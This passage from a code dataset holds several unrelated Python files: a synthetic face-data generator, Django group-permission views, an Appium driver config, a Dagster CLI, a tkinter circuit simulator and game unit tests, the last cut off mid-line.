= np.load(op.join(save_dir, '%s_decomp_comps.npy' % mod))\n\n nz_mask = np.load(op.join(save_dir, '%s_nzmask.npy' % mod))\n betas = self._load_chunks(mod, save_dir, 'betas')\n resids_decomp = self._load_chunks(mod, save_dir, 'residuals_decomp')\n relev_scodes = get_scodes_given_criteria(gender, age, age_range, ethn, 'v1')\n idx = self._get_idx_of_scode(relev_scodes)\n relev_resids = resids_decomp[idx, :]\n random_data = np.zeros((N, decomp_comps.shape[0]))\n for i in range(N): # this can probably be implemented faster ...\n if dist == 'uniform':\n mins, maxs = relev_resids.min(axis=0), relev_resids.max(axis=0)\n random_data[i, :] = np.random.uniform(mins, maxs)\n elif dist == 'norm':\n means, stds = relev_resids.mean(axis=0), relev_resids.std(axis=0)\n random_data[i, :] = np.random.normal(means, stds)\n elif dist == 'mnorm':\n means = relev_resids.mean(axis=0)\n\n if shrinkage:\n cov = _cov(relev_resids, shrinkage='auto')\n else:\n cov = np.cov(relev_resids.T)\n\n random_data[i, :] = np.random.multivariate_normal(means, cov)\n else:\n raise ValueError(\"Please choose `dist` from ('uniform', \"\n \"'norm', 'mnorm')\")\n\n # For debugging\n if algorithm == 'pca':\n decomp_means = np.load(op.join(save_dir, '%s_decomp_means.npy' % mod))\n if whitened:\n decomp_explvar = np.load(op.join(save_dir, '%s_decomp_explvar.npy' % mod))\n resids_inv = np.dot(random_data, np.sqrt(decomp_explvar[:, np.newaxis]) *\n decomp_comps) + decomp_means\n else:\n resids_inv = random_data.dot(decomp_comps) + decomp_means\n elif algorithm == 'ica':\n resids_inv = random_data.dot(decomp_comps.T)\n resid_means = np.load(op.join(save_dir, '%s_residuals_means.npy' % mod))\n resid_stds = np.load(op.join(save_dir, '%s_residuals_stds.npy' % mod))\n resids_inv *= resid_stds\n resids_inv += resid_means\n elif algorithm == 'nmf':\n resids_inv = random_data.dot(decomp_comps)\n resid_mins = np.load(op.join(save_dir, '%s_residuals_mins.npy' % mod))\n resid_scale = np.load(op.join(save_dir, '%s_residuals_scale.npy' % mod))\n resids_inv -= resid_mins\n resids_inv /= resid_scale\n\n norm_vec = self._generate_design_vector(gender, age, ethn)\n norm = norm_vec.dot(betas)\n final_face_data = norm + resids_inv\n for i in range(N):\n tmp = np.zeros(DATA_SHAPES[self.version][mod])\n tmp[nz_mask] = final_face_data[i, :]\n tmp = tmp.reshape(DATA_SHAPES[self.version][mod])\n to_write[i][mod] = tmp\n\n to_return = []\n for key, value in to_write.items():\n name = 'id-g%i_gen-%s_age-%i_eth-%s.mat' % (key, gender, age, ethn)\n outname = op.join(save_dir, name)\n savemat(outname, value)\n to_return.append(outname)\n\n return to_return\n\n def _load_chunks(self, mod, save_dir, idf):\n \"\"\" Loads data which may be in chunks.\n\n Parameters\n ----------\n mod : str\n Modality of requested data ('textures' or 'vertices')\n save_dir : str\n Path to directory with (intermediate) results.\n idf : str\n Identifier for files (e.g., 'betas' or 'residuals')\n\n Returns\n -------\n out : numpy array\n Array with data (chunked data is stacked)\n \"\"\"\n files = sorted(glob(op.join(save_dir, '%s_%s*.npy' % (mod, idf))))\n\n if len(files) == 1:\n out = np.load(files[0])\n elif len(files) > 1:\n out = np.hstack(([np.load(f) for f in files]))\n else:\n raise ValueError(\"Could not find files with identifier '%s'!\" % idf)\n\n return out\n\n def _get_idx_of_scode(self, scode, save_dir=None):\n \"\"\" Returns index of scode. \"\"\"\n\n if not isinstance(scode, np.ndarray):\n scode = np.array(scode)\n\n if save_dir is None:\n save_dir = self.save_dir\n\n all_scodes = np.load(op.join(save_dir, 'scodes.npy'))\n return np.isin(all_scodes, scode)\n\n def _generate_design_vector(self, gender, age, ethn):\n \"\"\" Generates a 'design vector' (for lack of a better word). \"\"\"\n mapping = dict(WC=[1, 0, 0], BA=[0, 1, 0], EA=[0, 0, 1])\n gender = [0, 1] if gender == 'F' else [1, 0]\n des_vec = np.array([1] + gender + mapping[ethn] + [age])[np.newaxis, :]\n des_vec = self._add_interactions(des_vec)\n\n return des_vec\n\n def _add_interactions(self, X):\n \"\"\" Adds interaction terms to X. \"\"\"\n pnf = PolynomialFeatures(interaction_only=True)\n return pnf.fit_transform(X)\n","sub_path":"GFG_python/glm.py","file_name":"glm.py","file_ext":"py","file_size_in_byte":17522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"647422892","text":"from django.views.generic import ListView, View, TemplateView\nfrom django.contrib.auth.models import Group, Permission, ContentType\nfrom django.http import JsonResponse, Http404, HttpResponse, QueryDict\nfrom django.db import IntegrityError\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom accounts.forms import CreateGroupForm\nfrom accounts.mixins import PermissionRequiredMixin\n\nclass GroupListView(LoginRequiredMixin, PermissionRequiredMixin, ListView):\n ## 用户组列表\n permission_required = \"auth.view_group\"\n model = Group\n template_name = \"user/grouplist.html\"\n\n\nclass GroupCreateView(LoginRequiredMixin, View):\n ##创建用户组\n def post(self, request):\n ret = {\"status\": 0}\n if not request.user.has_perm('auth.add_group'):\n ret['status'] = 1\n ret['errmsg'] = \"没有权限,请联系管理员\"\n return JsonResponse(ret)\n groupform = CreateGroupForm(request.POST)\n if groupform.is_valid():\n try:\n g = Group(**groupform.cleaned_data)\n g.save()\n except Exception as e:\n ret['status'] = 1\n ret['errmsg'] = e.args\n else:\n ret['status'] = 1\n ret['errmsg'] = \"没有输入内容,请重新输入\"\n return JsonResponse(ret)\n\nclass GroupDeleteView(LoginRequiredMixin, View):\n ##删除用户组\n def delete(self, request):\n ret = {\"status\":0}\n if not request.user.has_perm('auth.delete_group'):\n ret['status'] = 1\n ret['errmsg'] = \"没有权限,请联系管理员\"\n return JsonResponse(ret)\n data_name = QueryDict(request.body)\n groupid = data_name.get(\"gname\", \"\")\n try:\n g = Group.objects.get(pk=groupid)\n except Group.DoesNotExist:\n ret['status'] = 1\n ret['errmsg'] = \"用户组不存在\"\n return JsonResponse(ret)\n try:\n gtou = g.user_set.all()\n if gtou:\n ret['status'] = 1\n ret['errmsg'] = \"该组有用户,不能删除\"\n return JsonResponse(ret)\n except:\n pass\n try:\n gtoper = g.permissions.all()\n if gtoper:\n ret['status'] = 1\n ret['errmsg'] = \"该组有组权限,不能删除\"\n return JsonResponse(ret)\n except:\n pass\n g.delete()\n return JsonResponse(ret)\n\nclass GroupuserListView(LoginRequiredMixin, PermissionRequiredMixin, View):\n ##查看用户组里用户列表\n permission_required = \"auth.view_user\"\n\n def get(self, request, *args, **kwargs):\n groupid = request.GET.get(\"gid\", \"\")\n try:\n get_group = Group.objects.get(id=groupid)\n object_list = get_group.user_set.all()\n except Group.DoesNotExist:\n raise Http404(\"group is not exist.\")\n return render(request, \"user/groupuserlist.html\", {\"object_list\": object_list, \"groupname\":get_group})\n\nclass ModifyGroupPermissionList(LoginRequiredMixin, PermissionRequiredMixin, TemplateView):\n ##修改用户组权限的列表\n permission_required = \"auth.change_permission\"\n template_name = \"user/modify_group_permission.html\"\n\n def get_context_data(self, **kwargs):\n context = super(ModifyGroupPermissionList, self).get_context_data(**kwargs)\n context[\"contenttypes\"] = ContentType.objects.all()\n context[\"group\"] = self.request.GET.get(\"gid\")\n context[\"group_permissions\"] = self.get_group_permissions(context[\"group\"])\n return context\n\n def get_group_permissions(self, groupid):\n try:\n group_obj = Group.objects.get(pk=groupid)\n return [p.id for p in group_obj.permissions.all()]\n except Group.DoesNotExist:\n return redirect(\"error\", next=\"group_list\", msg=\"用户组不存在\")\n\n def post(self, request):\n ##获取前端用户组设置的权限list,设置组权限,否则清空组权限\n permission_id_list = request.POST.getlist(\"permission\", [])\n groupid = request.POST.get(\"groupid\", 0)\n try:\n group_obj = Group.objects.get(pk=groupid)\n except Group.DoesNotExist:\n return redirect(\"error\", next=\"group_list\", msg=\"用户组不存在\")\n\n if len(permission_id_list) > 0:\n permission_objs = Permission.objects.filter(id__in=permission_id_list)\n group_obj.permissions.set(permission_objs)\n else:\n group_obj.permissions.clear()\n return redirect(\"success\", next=\"group_list\")\n\nclass GroupPermissionListView(LoginRequiredMixin, PermissionRequiredMixin, TemplateView):\n ##组权限列表\n permission_required = \"auth.view_permission\"\n template_name = \"user/permission_group_list.html\"\n\n def get_context_data(self, **kwargs):\n context = super(GroupPermissionListView, self).get_context_data(**kwargs)\n gid = self.request.GET.get(\"gid\", \"\")\n try:\n group_obj = Group.objects.get(pk=gid)\n context[\"groupname\"] = group_obj\n context[\"group_permissions\"] = group_obj.permissions.all()\n return context\n except Group.DoesNotExist:\n return redirect(\"error\", next=\"group_list\", msg=\"用户组不存在\")\n","sub_path":"zhangwenbo/accounts/group/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"213205596","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport yaml\nfrom appium import webdriver\nfrom common.loged import *\nimport os\n\n#公共方法\n\"\"\"def appium_desired():\n file = open('../yamlFile/desired_caps.yaml','r')\n data = yaml.load(file, Loader=yaml.SafeLoader)\n desired_caps = {}\n desired_caps['platformName'] = data['platformName']\n desired_caps['deviceName'] = data['deviceName']\n desired_caps['platformVersion'] = str(data['platformVersion'])\n desired_caps['appPackage'] = data['appPackage']\n desired_caps['appActivity'] = data['appActivity']\n desired_caps['noReset'] = data['noReset']\n desired_caps['resetKeyboard'] = data['resetKeyboard']\n driver = webdriver.Remote('http://' + str(data['ip']) + ':' + str(data['port']) + '/wd/hub', desired_caps)\n driver.implicitly_wait(8)\n return driver\"\"\"\nclass Driver_Config():\n\n def get_driver(self):\n log = Logger('D:\\ZYCami_00\\logs\\\\error.log', level='debug')\n try:\n file = open('../yamlFile/desired_caps.yaml', 'r')\n data = yaml.load(file, Loader=yaml.SafeLoader)\n self.desired_caps = {}\n self.desired_caps['platformName'] = data['platformName']\n self.desired_caps['deviceName'] = data['deviceName']\n self.desired_caps['platformVersion'] = str(data['platformVersion'])\n self.desired_caps['appPackage'] = data['appPackage']\n self.desired_caps['appActivity'] = data['appActivity']\n self.desired_caps['noReset'] = data['noReset']\n self.desired_caps['resetKeyboard'] = data['resetKeyboard']\n self.driver = webdriver.Remote('http://' + str(data['ip']) + ':' + str(data['port']) + '/wd/hub', self.desired_caps)\n self.driver.implicitly_wait(8)\n\n return self.driver\n except Exception as e:\n log.logger.error('错误:{}'.format(e))\n\n","sub_path":"ZYCami_00_unittest2/Public/Caplictily.py","file_name":"Caplictily.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"582270147","text":"import click\nfrom dagster import DagsterInstance\nfrom dagster.daemon.run_coordinator.queued_run_coordinator_daemon import QueuedRunCoordinatorDaemon\n\n\ndef create_run_coordinator_cli_group():\n group = click.Group()\n group.add_command(run_command)\n return group\n\n\n@click.command(\n name=\"run\", help=\"Poll for queued runs and launch them\",\n)\n@click.option(\n \"--interval-seconds\", help=\"How long to wait (seconds) between polls for runs\", default=2\n)\n@click.option(\n \"--max-concurrent-runs\", help=\"Max number of runs that should be executing at once\", default=10,\n)\ndef run_command(interval_seconds, max_concurrent_runs):\n coordinator = QueuedRunCoordinatorDaemon(\n DagsterInstance.get(), max_concurrent_runs=max_concurrent_runs\n )\n click.echo(\"Starting run coordinator\")\n coordinator.run(interval_seconds=interval_seconds)\n","sub_path":"python_modules/dagster/dagster/daemon/cli/run_coordinator_cli.py","file_name":"run_coordinator_cli.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"147658587","text":"import tkinter as tk\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\n\n#FUNCTION\ndef runSimRC():\n combo_value = combo1_RC.get()\n combo_value2 = combo2_RC.get()\n vi = ent_vi_RC.get()\n r1 = ent_r1_RC.get()\n r2 = ent_r2_RC.get()\n c = ent_c_RC.get()\n\n if (combo_value == \"1st Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian1_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian1_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"1st Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian1_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian1_current.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"2nd Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian2_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian2_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"2nd Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian2_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian2_current.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"3rd Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian3_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian3_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"3rd Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian3_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian3_current.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"4th Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian4_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian4_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"4th Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian4_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian4_current.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"5th Circuit\" and combo_value2 == \"Voltage\"):\n file_name = \"rangkaian5_voltage \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian5_voltage.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"5th Circuit\" and combo_value2 == \"Current\"):\n file_name = \"rangkaian5_current \"\n os.system(file_name +vi+\" \"+r1+\" \"+r2+\" \"+c)\n print(file_name, vi, r1, r2, c) #debug\n x, y = np.loadtxt(\"rangkaian5_current.csv\", unpack=True, delimiter=\",\")\n\n plt.plot(x,y)\n plt.xlabel(\"Time (s)\")\n plt.grid()\n plt.xlim(0)\n plt.ylim(0)\n\n if(combo_value2 == \"Voltage\"):\n plt.title(\"Output Voltage-Time Graph\")\n plt.ylabel(\"Output Voltage (V)\")\n else:\n plt.title(\"Output Current-Time Graph\")\n plt.ylabel(\"Output Current (A)\")\n\n plt.show()\n\ndef runSimDiff():\n combo_value = combo1_diff.get()\n combo_value2 = combo2_diff.get()\n A = ent_A_diff.get()\n T = ent_T_diff.get()\n R = ent_R_diff.get()\n C = ent_C_diff.get()\n\n if (combo_value == \"Sine\" and combo_value2 == \"Input Voltage\"):\n file_name = \"diff_sinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"input_voltage_sinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Sine\" and combo_value2 == \"Output Voltage\"):\n file_name = \"diff_sinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_voltage_sinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Sine\" and combo_value2 == \"Output Current\"):\n file_name = \"diff_sinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_current_sinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Cosine\" and combo_value2 == \"Input Voltage\"):\n file_name = \"diff_cosinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"input_voltage_cosinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Cosine\" and combo_value2 == \"Output Voltage\"):\n file_name = \"diff_cosinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_voltage_cosinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Cosine\" and combo_value2 == \"Output Current\"):\n file_name = \"diff_cosinus \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_current_cosinus.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Triangle\" and combo_value2 == \"Input Voltage\"):\n file_name = \"diff_triangular \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"input_voltage_triangular.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Triangle\" and combo_value2 == \"Output Voltage\"):\n file_name = \"diff_triangular \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_voltage_triangular.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Triangle\" and combo_value2 == \"Output Current\"):\n file_name = \"diff_triangular \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_current_triangular.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Square\" and combo_value2 == \"Input Voltage\"):\n file_name = \"diff_square \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"input_voltage_square.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Square\" and combo_value2 == \"Output Voltage\"):\n file_name = \"diff_square \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_voltage_square.csv\", unpack=True, delimiter=\",\")\n elif (combo_value == \"Square\" and combo_value2 == \"Output Current\"):\n file_name = \"diff_square \"\n os.system(file_name +A+\" \"+T+\" \"+R+\" \"+C)\n print(file_name, A, T, R, C) #debug\n x, y = np.loadtxt(\"output_current_square.csv\", unpack=True, delimiter=\",\")\n\n plt.plot(x,y)\n plt.xlabel(\"Time (s)\")\n plt.grid()\n plt.xlim(0)\n\n if (combo_value2 == \"Output Voltage\"):\n plt.title(\"Output Voltage-Time Graph\")\n plt.ylabel(\"Output Voltage (V)\")\n else:\n plt.title(\"Input Voltage-Time Graph\")\n plt.ylabel(\"Input Voltage (V)\")\n\n plt.show()\n\n#MAIN\nwindow = tk.Tk()\nwindow.title(\"Tugas Besar PMC - Kelompok 2\")\nwindow.geometry(\"900x650\")\nwindow.resizable(width=True, height=True)\n\nlbl_judul = tk.Label(text=\"RC AND DIFFERENTIATOR CIRCUIT SIMULATOR\", font=\"Tahoma 18 bold\", bg=\"white\")\nlbl_judul.grid(row=0, columnspan=10)\n\nlbl_penjelasan = tk.Label(text=\"by Group 2 of EL2008\\nThis simulator is a simulator for simulating RC circuits and first-order differentiator op-amp circuits.\\nThe form on the left is the form to do RC simulation while the right form is to simulate the differentiator circuit.\\nTo conduct a simulation, the user immediately fills in all the required data on each form then presses the submit button and the simulation will run.\\nEnjoy simulating!\", bg=\"white\")\nlbl_penjelasan.grid(columnspan=10, row=1, pady=10)\n\nphoto1 = tk.PhotoImage(file=\"rsz_rangkaian1.png\")\npict_circuit1 = tk.Label(window, image=photo1, bg=\"white\")\npict_circuit1.grid(row=2, column=0, columnspan=2)\n\nphoto2 = tk.PhotoImage(file=\"rsz_rangkaian2.png\")\npict_circuit2 = tk.Label(window, image=photo2, bg=\"white\")\npict_circuit2.grid(row=2, column=2, columnspan=2)\n\nphoto3 = tk.PhotoImage(file=\"rsz_rangkaian3.png\")\npict_circuit3 = tk.Label(window, image=photo3, bg=\"white\")\npict_circuit3.grid(row=2, column=4, columnspan=2)\n\nphoto4 = tk.PhotoImage(file=\"rsz_rangkaian4.png\")\npict_circuit4 = tk.Label(window, image=photo4, bg=\"white\")\npict_circuit4.grid(row=2, column=6, columnspan=2)\n\nphoto5 = tk.PhotoImage(file=\"rsz_rangkaian5.png\")\npict_circuit5 = tk.Label(window, image=photo5, bg=\"white\")\npict_circuit5.grid(row=2, column=8, columnspan=2)\n\nphoto6 = tk.PhotoImage(file=\"rsz_differentiator.png\")\npict_circuit6 = tk.Label(window, image=photo6, bg=\"white\")\npict_circuit6.grid(row=3, column=0, columnspan=2)\n\nphoto7 = tk.PhotoImage(file=\"rsz_sinus.png\")\npict_sin = tk.Label(window, image=photo7, bg=\"white\")\npict_sin.grid(row=3, column=2, columnspan=2)\n\nphoto8 = tk.PhotoImage(file=\"rsz_cosinus.png\")\npict_cos = tk.Label(window, image=photo8, bg=\"white\")\npict_cos.grid(row=3, column=4, columnspan=2)\n\nphoto9 = tk.PhotoImage(file=\"rsz_triangle.png\")\npict_triangle = tk.Label(window, image=photo9, bg=\"white\")\npict_triangle.grid(row=3, column=6, columnspan=2)\n\nphoto10 = tk.PhotoImage(file=\"rsz_square.png\")\npict_square = tk.Label(window, image=photo10, bg=\"white\")\npict_square.grid(row=3, column=8, columnspan=2)\n\n#Gap\nlbl_gap = tk.Label(bg=\"white\")\nlbl_gap.grid(column=0, row=4, columnspan=10, pady=0)\n\n#RC Circuit\nlbl_headingRC = tk.Label(text=\"RC Circuit\", font=\"Tahoma 12 bold underline\", bg=\"white\")\nlbl_headingRC.grid(column=0, row=5, columnspan=5, pady=10)\n\n#Combobox 1 RC\nlbl_combo1_RC = tk.Label(text=\"Circuit Type = \", bg=\"white\")\nlbl_combo1_RC.grid(column=0, row=6, columnspan=2)\ncombo1_RC = ttk.Combobox(window, values=[\"1st Circuit\", \"2nd Circuit\", \"3rd Circuit\", \"4th Circuit\", \"5th Circuit\"])\ncombo1_RC.grid(column=2, row=6)\ncombo1_RC.current(0)\n\n#Combobox 2 RC\nlbl_combo2_RC = tk.Label(text=\"Output Variable = \", bg=\"white\")\nlbl_combo2_RC.grid(column=0, row=7, columnspan=2)\ncombo2_RC = ttk.Combobox(window, values=[\"Voltage\", \"Current\"])\ncombo2_RC.grid(column=2, row=7)\ncombo2_RC.current(0)\n\n#Entry vi\nlbl_vi_RC = tk.Label(text=\"Vi = \", bg=\"white\")\nlbl_vi_RC.grid(column=0, row=8, columnspan=2)\nent_vi_RC = tk.Entry(width=20)\nent_vi_RC.grid(column=2, row=8)\nlbl_vi2_RC = tk.Label(text=\" V\", bg=\"white\")\nlbl_vi2_RC.grid(column=3, row=8)\n\n#Entry R1\nlbl_r1_RC = tk.Label(text=\"R1 = \", bg=\"white\")\nlbl_r1_RC.grid(column=0, row=9, columnspan=2)\nent_r1_RC = tk.Entry(width=20)\nent_r1_RC.grid(column=2, row=9)\nlbl_r12_RC = tk.Label(text=\" Ω\", bg=\"white\")\nlbl_r12_RC.grid(column=3, row=9)\n\n#Entry R2\nlbl_r2_RC = tk.Label(text=\"R2 = \", bg=\"white\")\nlbl_r2_RC.grid(column=0, row=10, columnspan=2)\nent_r2_RC = tk.Entry(width=20)\nent_r2_RC.grid(column=2, row=10)\nlbl_r22_RC = tk.Label(text=\" Ω\", bg=\"white\")\nlbl_r22_RC.grid(column=3, row=10)\n\n#Entry C\nlbl_c_RC = tk.Label(text=\"C = \", bg=\"white\")\nlbl_c_RC.grid(column=0, row=11, columnspan=2)\nent_c_RC = tk.Entry(width=20)\nent_c_RC.grid(column=2, row=11)\nlbl_c2_RC = tk.Label(text=\" F\", bg=\"white\")\nlbl_c2_RC.grid(column=3, row=11)\n\n#Submit RC\nbtn_submit_RC = tk.Button(text=\"Submit Data\", bg='#C2EDFD', command=runSimRC)\nbtn_submit_RC.grid(column=0, row=12, columnspan=5)\n\n#Gap\nlbl_gap2 = tk.Label(bg=\"white\")\nlbl_gap2.grid(column=4, row=6, columnspan=2, rowspan=7)\n\n#Differentiator\nlbl_headingDiff = tk.Label(text=\"Differentiator Circuit\", font=\"Tahoma 12 bold underline\", bg=\"white\")\nlbl_headingDiff.grid(column=6, row=5, columnspan=5, pady=10)\n\n#Combobox 1 Diff\nlbl_combo1_diff = tk.Label(text=\"Input Wave = \", bg=\"white\")\nlbl_combo1_diff.grid(column=6, row=6, columnspan=2)\ncombo1_diff = ttk.Combobox(window, values=[\"Sine\", \"Cosine\", \"Triangle\", \"Square\"])\ncombo1_diff.grid(column=8, row=6)\ncombo1_diff.current(0)\n\n#Combobox 2 Diff\nlbl_combo2_diff = tk.Label(text=\"Variable = \", bg=\"white\")\nlbl_combo2_diff.grid(column=6, row=7, columnspan=2)\ncombo2_diff = ttk.Combobox(window, values=[\"Input Voltage\", \"Output Voltage\", \"Output Current\"])\ncombo2_diff.grid(column=8, row=7)\ncombo2_diff.current(0)\n\n#Entry A\nlbl_A_diff = tk.Label(text=\"Input Amplitude = \", bg=\"white\")\nlbl_A_diff.grid(column=6, row=8, columnspan=2)\nent_A_diff = tk.Entry(width=20)\nent_A_diff.grid(column=8, row=8)\nlbl_A2_diff = tk.Label(text=\" V\", bg=\"white\")\nlbl_A2_diff.grid(column=9, row=8)\n\n#Entry T\nlbl_T_diff = tk.Label(text=\"Period (T) = \", bg=\"white\")\nlbl_T_diff.grid(column=6, row=9, columnspan=2)\nent_T_diff = tk.Entry(width=20)\nent_T_diff.grid(column=8, row=9)\nlbl_T2_diff = tk.Label(text=\" s\", bg=\"white\")\nlbl_T2_diff.grid(column=9, row=9)\n\n#Entry R Diff\nlbl_R_diff = tk.Label(text=\"R = \", bg=\"white\")\nlbl_R_diff.grid(column=6, row=10, columnspan=2)\nent_R_diff = tk.Entry(width=20)\nent_R_diff.grid(column=8, row=10)\nlbl_R2_diff = tk.Label(text=\" Ω\", bg=\"white\")\nlbl_R2_diff.grid(column=9, row=10)\n\n#Entry C Diff\nlbl_C_diff = tk.Label(text=\"C = \", bg=\"white\")\nlbl_C_diff.grid(column=6, row=11, columnspan=2)\nent_C_diff = tk.Entry(width=20)\nent_C_diff.grid(column=8, row=11)\nlbl_C2_diff = tk.Label(text=\" F\", bg=\"white\")\nlbl_C2_diff.grid(column=9, row=11)\n\n#Submit Diff\nbtn_submit_diff = tk.Button(text=\"Submit Data\", bg='#C2EDFD', command=runSimDiff)\nbtn_submit_diff.grid(column=6, row=12, columnspan=5)\n\nwindow.configure(bg=\"white\")\nwindow.mainloop()","sub_path":"top_RC_simulator.py","file_name":"top_RC_simulator.py","file_ext":"py","file_size_in_byte":14078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"531882962","text":"from unittest.mock import patch\nimport pytest\n\n\nfrom actors import Player, Roll\nimport program\n\n\n@pytest.fixture()\ndef player():\n return Player('John')\n\n\n@pytest.fixture()\ndef rolls():\n program.read_rolls()\n return program.rolls\n\n\n@pytest.fixture()\ndef player1():\n return Player('Player 1')\n\n\n@pytest.fixture()\ndef player2():\n return Player('Player 2')\n\n\n### Player tests ###\ndef test_player_name(player):\n assert player.name == 'John'\n\n\ndef test_player_points(player):\n # Good\n assert player.points == 0\n player.add_point()\n # Good\n assert player.points == 1\n player.add_point()\n player.add_point()\n # Good\n assert player.points == 3\n\n\n### Roll tests ###\ndef test_roll_defeat():\n rock = Roll('rock', ['paper'])\n paper = Roll('paper', ['scissor'])\n scissor = Roll('scissor', ['rock'])\n\n # Paper beat rock\n assert not rock.can_defeat(paper)\n # Good\n assert rock.can_defeat(scissor)\n # Good\n assert paper.can_defeat(rock)\n\n\n### Program tests ###\ndef test_add_roll():\n row = {\n 'Human': 'win', 'Gun': 'lose', 'Lightning': 'lose', 'Paper': 'lose',\n 'Tree': 'win', 'Devil': 'lose', 'Wolf': 'win', 'Water': 'lose',\n 'Scissors': 'win', 'Fire': 'win', 'Dragon': 'lose', 'Snake': 'win',\n 'Air': 'lose', 'Rock': 'draw', 'Attacker': 'Rock', 'Sponge': 'win'\n }\n rock = program.add_roll(row)\n\n assert rock.name == 'Rock'\n assert rock.defeated_by == [\n 'Air', 'Devil', 'Dragon', 'Gun', 'Lightning', 'Paper', 'Water'\n ]\n\n\n@patch(\"builtins.input\", side_effect=[2323, 'asd', 0])\ndef test_ask_for_roll(inp, rolls):\n # Not a correct roll\n with pytest.raises(ValueError):\n program.ask_for_roll(rolls)\n\n # Not a number\n with pytest.raises(ValueError):\n program.ask_for_roll(rolls)\n\n # Good\n assert rolls[0].name == program.ask_for_roll(rolls).name\n\n\n@patch(\"builtins.input\", side_effect=['John'])\ndef test_get_players_name(inp):\n assert program.get_players_name() == 'John'\n\n\ndef 